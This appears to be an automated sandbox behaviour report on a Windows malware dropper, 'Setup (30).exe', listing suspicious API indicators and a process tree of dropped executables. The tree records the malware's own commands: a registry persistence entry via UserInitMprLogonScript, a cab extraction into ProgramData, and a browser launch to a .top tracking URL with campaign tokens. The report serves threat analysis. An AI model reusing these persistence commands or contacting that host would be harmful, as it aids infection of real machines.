pid Process 1832 yaA9xsNGEIw3vDLIIaEbBWpe.exe 1656 4AEMR5olCp_tVzrTVx6ANnLU.exe 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 3192 Process not Found 6836 explorer.exe 6836 explorer.exe 3192 Process not Found 3192 Process not Found 6836 explorer.exe 6836 explorer.exe 3192 Process not Found 3192 Process not Found 6836 explorer.exe 6836 explorer.exe 6836 explorer.exe 6836 explorer.exe 6836 explorer.exe 6836 explorer.exe 3192 Process not Found 3192 Process not Found 6836 explorer.exe 6836 explorer.exe 6836 explorer.exe 6836 explorer.exe 3192 Process not Found 3192 Process not Found 6836 explorer.exe 6836 explorer.exe 6836 explorer.exe 6836 explorer.exe 3192 Process not Found 3192 Process not Found 6836 explorer.exe 6836 explorer.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
pid Process 5748 6885585.exe 2860 1342398.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3504 1s70wYAppnfh4epILpN1LXtC.exe Token: SeDebugPrivilege 1848 2105549.exe Token: SeDebugPrivilege 4596 w32aqHUPTZAOK7mL1sdcXC3S.exe Token: SeDebugPrivilege 4964 5926773.exe Token: SeDebugPrivilege 1020 y9dPhZn_rIlIaPgdmLEIuFmf.exe Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeDebugPrivilege 2496 5534478.exe Token: SeRestorePrivilege 3280 WerFault.exe Token: SeBackupPrivilege 3280 WerFault.exe Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeShutdownPrivilege 3192 Process not Found Token: SeCreatePagefilePrivilege 3192 Process not Found Token: SeCreateTokenPrivilege 4796 explorer.exe Token: SeAssignPrimaryTokenPrivilege 4796 explorer.exe Token: SeLockMemoryPrivilege 4796 explorer.exe Token: SeIncreaseQuotaPrivilege 4796 explorer.exe Token: SeMachineAccountPrivilege 4796 explorer.exe Token: SeTcbPrivilege 4796 explorer.exe Token: SeSecurityPrivilege 4796 explorer.exe Token: SeTakeOwnershipPrivilege 4796 explorer.exe Token: SeLoadDriverPrivilege 4796 explorer.exe Token: SeSystemProfilePrivilege 4796 explorer.exe Token: SeSystemtimePrivilege 4796 explorer.exe Token: SeProfSingleProcessPrivilege 4796 explorer.exe Token: SeIncBasePriorityPrivilege 4796 explorer.exe Token: SeCreatePagefilePrivilege 4796 explorer.exe Token: SeCreatePermanentPrivilege 4796 explorer.exe Token: SeBackupPrivilege 4796 explorer.exe Token: SeRestorePrivilege 4796 explorer.exe Token: SeShutdownPrivilege 4796 explorer.exe Token: SeDebugPrivilege 4796 explorer.exe Token: SeAuditPrivilege 4796 explorer.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1364 kzAGxUZZ0Y7rgkaissVSahJo.tmp 4636 Cleaner Installation.exe 4468 ultramediaburner.tmp 4380 WEATHER Manager.tmp 812 VPN.tmp 3032 P_xKE8bZV36d4TGV80AfTK07.tmp 1028 Setup.exe 7044 msedge.exe 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 1760 GameBoxWin64.exe 7148 Esplorarne.exe.com 7148 Esplorarne.exe.com 7148 Esplorarne.exe.com 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 2024 Setup.tmp 6620 Esplorarne.exe.com 6620 Esplorarne.exe.com -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 7148 Esplorarne.exe.com 7148 Esplorarne.exe.com 7148 Esplorarne.exe.com 6620 Esplorarne.exe.com 6620 Esplorarne.exe.com 6620 Esplorarne.exe.com 2972 Esplorarne.exe.com 2972 Esplorarne.exe.com 2972 Esplorarne.exe.com 4860 mask_svc.exe 4860 mask_svc.exe 4860 mask_svc.exe 3936 Esplorarne.exe.com 3936 Esplorarne.exe.com 3936 Esplorarne.exe.com 4484 Esplorarne.exe.com 4484 Esplorarne.exe.com 4484 Esplorarne.exe.com 5056 11111.exe 5056 11111.exe 5056 11111.exe 4192 Esplorarne.exe.com 4192 Esplorarne.exe.com 4192 Esplorarne.exe.com -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 6060 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4128 wrote to memory of 4596 4128 Setup (30).exe 83 PID 4128 wrote to memory of 4596 4128 Setup (30).exe 83 PID 4128 wrote to memory of 4596 4128 Setup (30).exe 83 PID 4128 wrote to memory of 5016 4128 Setup (30).exe 82 PID 4128 wrote to memory of 5016 4128 Setup (30).exe 82 PID 4128 wrote to memory of 5016 4128 Setup (30).exe 82 PID 4128 wrote to memory of 3600 4128 Setup (30).exe 84 PID 4128 wrote to memory of 3600 4128 Setup (30).exe 84 PID 4128 wrote to memory of 3600 4128 Setup (30).exe 84 PID 4128 wrote to memory of 3504 4128 Setup (30).exe 81 PID 4128 wrote to memory of 3504 4128 Setup (30).exe 81 PID 4128 wrote to memory of 1188 4128 Setup (30).exe 80 PID 4128 wrote to memory of 1188 4128 Setup (30).exe 80 PID 4128 wrote to memory of 1188 4128 Setup (30).exe 80 PID 4128 wrote to memory of 724 4128 Setup (30).exe 88 PID 4128 wrote to memory of 724 4128 Setup (30).exe 88 PID 4128 wrote to memory of 724 4128 Setup (30).exe 88 PID 3600 wrote to memory of 1020 3600 y9dPhZn_rIlIaPgdmLEIuFmf.exe 90 PID 3600 wrote to memory of 1020 3600 y9dPhZn_rIlIaPgdmLEIuFmf.exe 90 PID 3600 wrote to memory of 1020 3600 y9dPhZn_rIlIaPgdmLEIuFmf.exe 90 PID 5016 wrote to memory of 856 5016 8aooTTpmqFUcPoRNHDe9oWwQ.exe 91 PID 5016 wrote to memory of 856 5016 8aooTTpmqFUcPoRNHDe9oWwQ.exe 91 PID 5016 wrote to memory of 856 5016 8aooTTpmqFUcPoRNHDe9oWwQ.exe 91 PID 724 wrote to memory of 344 724 K5DoxdNTEGDQnU1A_ibMCK33.exe 92 PID 724 wrote to memory of 344 724 K5DoxdNTEGDQnU1A_ibMCK33.exe 92 PID 724 wrote to memory of 344 724 K5DoxdNTEGDQnU1A_ibMCK33.exe 92 PID 1188 wrote to memory of 1832 1188 yaA9xsNGEIw3vDLIIaEbBWpe.exe 94 PID 1188 wrote to memory of 1832 1188 yaA9xsNGEIw3vDLIIaEbBWpe.exe 94 PID 1188 wrote to memory of 1832 1188 yaA9xsNGEIw3vDLIIaEbBWpe.exe 94 PID 3504 wrote to memory of 1848 3504 1s70wYAppnfh4epILpN1LXtC.exe 95 PID 3504 wrote to memory of 1848 3504 1s70wYAppnfh4epILpN1LXtC.exe 95 PID 1188 wrote to memory of 1832 1188 yaA9xsNGEIw3vDLIIaEbBWpe.exe 94 PID 1188 wrote to memory of 1832 1188 yaA9xsNGEIw3vDLIIaEbBWpe.exe 94 PID 1188 wrote to memory of 1832 1188 yaA9xsNGEIw3vDLIIaEbBWpe.exe 94 PID 3504 wrote to memory of 2336 3504 1s70wYAppnfh4epILpN1LXtC.exe 96 PID 3504 wrote to memory of 2336 3504 1s70wYAppnfh4epILpN1LXtC.exe 96 PID 3504 wrote to memory of 2336 3504 1s70wYAppnfh4epILpN1LXtC.exe 96 PID 4128 wrote to memory of 2424 4128 Setup (30).exe 97 PID 4128 wrote to memory of 2424 4128 Setup (30).exe 97 PID 4128 wrote to memory of 2424 4128 Setup (30).exe 97 PID 3504 wrote to memory of 2496 3504 1s70wYAppnfh4epILpN1LXtC.exe 99 PID 3504 wrote to memory of 2496 3504 1s70wYAppnfh4epILpN1LXtC.exe 99 PID 3504 wrote to memory of 2496 3504 1s70wYAppnfh4epILpN1LXtC.exe 99 PID 2424 wrote to memory of 1364 2424 kzAGxUZZ0Y7rgkaissVSahJo.exe 100 PID 2424 wrote to memory of 1364 2424 kzAGxUZZ0Y7rgkaissVSahJo.exe 100 PID 2424 wrote to memory of 1364 2424 kzAGxUZZ0Y7rgkaissVSahJo.exe 100 PID 3504 wrote to memory of 4964 3504 1s70wYAppnfh4epILpN1LXtC.exe 101 PID 3504 wrote to memory of 4964 3504 1s70wYAppnfh4epILpN1LXtC.exe 101 PID 3504 wrote to memory of 4964 3504 1s70wYAppnfh4epILpN1LXtC.exe 101 PID 3600 wrote to memory of 1020 3600 y9dPhZn_rIlIaPgdmLEIuFmf.exe 90 PID 3600 wrote to memory of 1020 3600 y9dPhZn_rIlIaPgdmLEIuFmf.exe 90 PID 3600 wrote to memory of 1020 3600 y9dPhZn_rIlIaPgdmLEIuFmf.exe 90 PID 3600 wrote to memory of 1020 3600 y9dPhZn_rIlIaPgdmLEIuFmf.exe 90 PID 3600 wrote to memory of 1020 3600 y9dPhZn_rIlIaPgdmLEIuFmf.exe 90 PID 5016 wrote to memory of 2236 5016 8aooTTpmqFUcPoRNHDe9oWwQ.exe 102 PID 5016 wrote to memory of 2236 5016 8aooTTpmqFUcPoRNHDe9oWwQ.exe 102 PID 5016 wrote to memory of 2236 5016 8aooTTpmqFUcPoRNHDe9oWwQ.exe 102 PID 2336 wrote to memory of 8 2336 8683850.exe 103 PID 2336 wrote to memory of 8 2336 8683850.exe 103 PID 2336 wrote to memory of 8 2336 8683850.exe 103 PID 5016 wrote to memory of 2236 5016 8aooTTpmqFUcPoRNHDe9oWwQ.exe 102 PID 5016 wrote to memory of 2236 5016 8aooTTpmqFUcPoRNHDe9oWwQ.exe 102 PID 5016 wrote to memory of 2236 5016 8aooTTpmqFUcPoRNHDe9oWwQ.exe 102 PID 5016 wrote to memory of 2236 5016 8aooTTpmqFUcPoRNHDe9oWwQ.exe 102
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (30).exe"C:\Users\Admin\AppData\Local\Temp\Setup (30).exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Users\Admin\Documents\yaA9xsNGEIw3vDLIIaEbBWpe.exe"C:\Users\Admin\Documents\yaA9xsNGEIw3vDLIIaEbBWpe.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Users\Admin\Documents\yaA9xsNGEIw3vDLIIaEbBWpe.exe"C:\Users\Admin\Documents\yaA9xsNGEIw3vDLIIaEbBWpe.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1832
-
-
-
C:\Users\Admin\Documents\1s70wYAppnfh4epILpN1LXtC.exe"C:\Users\Admin\Documents\1s70wYAppnfh4epILpN1LXtC.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Users\Admin\AppData\Roaming\2105549.exe"C:\Users\Admin\AppData\Roaming\2105549.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1848 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1848 -s 23044⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2764
-
-
-
C:\Users\Admin\AppData\Roaming\8683850.exe"C:\Users\Admin\AppData\Roaming\8683850.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:8
-
-
-
C:\Users\Admin\AppData\Roaming\5534478.exe"C:\Users\Admin\AppData\Roaming\5534478.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Users\Admin\AppData\Roaming\5926773.exe"C:\Users\Admin\AppData\Roaming\5926773.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4964 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 24404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 24404⤵
- Program crash
PID:3684
-
-
-
-
C:\Users\Admin\Documents\8aooTTpmqFUcPoRNHDe9oWwQ.exe"C:\Users\Admin\Documents\8aooTTpmqFUcPoRNHDe9oWwQ.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Users\Admin\Documents\8aooTTpmqFUcPoRNHDe9oWwQ.exeC:\Users\Admin\Documents\8aooTTpmqFUcPoRNHDe9oWwQ.exe3⤵
- Executes dropped EXE
PID:856
-
-
C:\Users\Admin\Documents\8aooTTpmqFUcPoRNHDe9oWwQ.exeC:\Users\Admin\Documents\8aooTTpmqFUcPoRNHDe9oWwQ.exe3⤵
- Executes dropped EXE
PID:2236 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3280
-
-
-
-
C:\Users\Admin\Documents\w32aqHUPTZAOK7mL1sdcXC3S.exe"C:\Users\Admin\Documents\w32aqHUPTZAOK7mL1sdcXC3S.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4596
-
-
C:\Users\Admin\Documents\y9dPhZn_rIlIaPgdmLEIuFmf.exe"C:\Users\Admin\Documents\y9dPhZn_rIlIaPgdmLEIuFmf.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Users\Admin\Documents\y9dPhZn_rIlIaPgdmLEIuFmf.exeC:\Users\Admin\Documents\y9dPhZn_rIlIaPgdmLEIuFmf.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
-
C:\Users\Admin\Documents\K5DoxdNTEGDQnU1A_ibMCK33.exe"C:\Users\Admin\Documents\K5DoxdNTEGDQnU1A_ibMCK33.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:724 -
C:\Users\Admin\Documents\K5DoxdNTEGDQnU1A_ibMCK33.exe"C:\Users\Admin\Documents\K5DoxdNTEGDQnU1A_ibMCK33.exe" -q3⤵
- Executes dropped EXE
PID:344
-
-
-
C:\Users\Admin\Documents\kzAGxUZZ0Y7rgkaissVSahJo.exe"C:\Users\Admin\Documents\kzAGxUZZ0Y7rgkaissVSahJo.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Users\Admin\AppData\Local\Temp\is-RF6LO.tmp\kzAGxUZZ0Y7rgkaissVSahJo.tmp"C:\Users\Admin\AppData\Local\Temp\is-RF6LO.tmp\kzAGxUZZ0Y7rgkaissVSahJo.tmp" /SL5="$701E8,138429,56832,C:\Users\Admin\Documents\kzAGxUZZ0Y7rgkaissVSahJo.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1364 -
C:\Users\Admin\AppData\Local\Temp\is-I9BBH.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-I9BBH.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3732 -
C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"5⤵
- Executes dropped EXE
PID:4980 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 3006⤵
- Program crash
PID:2036
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
- Executes dropped EXE
PID:1776 -
C:\Users\Admin\AppData\Local\Temp\is-SPTVV.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-SPTVV.tmp\Inlog.tmp" /SL5="$102BA,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵PID:4468
-
C:\Users\Admin\AppData\Local\Temp\is-GN4L7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GN4L7.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵
- Executes dropped EXE
PID:2940 -
C:\Users\Admin\AppData\Local\Temp\is-A7287.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-A7287.tmp\Setup.tmp" /SL5="$502E2,17367866,721408,C:\Users\Admin\AppData\Local\Temp\is-GN4L7.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵PID:7044
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-RFO1H.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵PID:4976
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:1284
-
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-RFO1H.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵
- Drops file in Windows directory
PID:6044
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵PID:2572
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵PID:4280
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RFO1H.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-RFO1H.tmp\{app}\vdi_compiler"9⤵PID:3996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 28810⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5640
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵PID:6332
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:6616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=72110⤵
- Adds Run key to start application
- Enumerates system info in registry
PID:3632 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffa0fb346f8,0x7ffa0fb34708,0x7ffa0fb3471811⤵PID:4128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:211⤵PID:5404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:811⤵PID:5580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:311⤵PID:3916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:111⤵PID:4028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:111⤵PID:3544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4564 /prefetch:111⤵PID:6096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:111⤵PID:6872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:111⤵PID:1776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:811⤵PID:5660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:811⤵PID:2080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3604 /prefetch:811⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:111⤵PID:132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:111⤵PID:2536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:111⤵PID:1376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:111⤵PID:1484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4614307294818943957,2072004251830921960,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:111⤵PID:5928
-
-
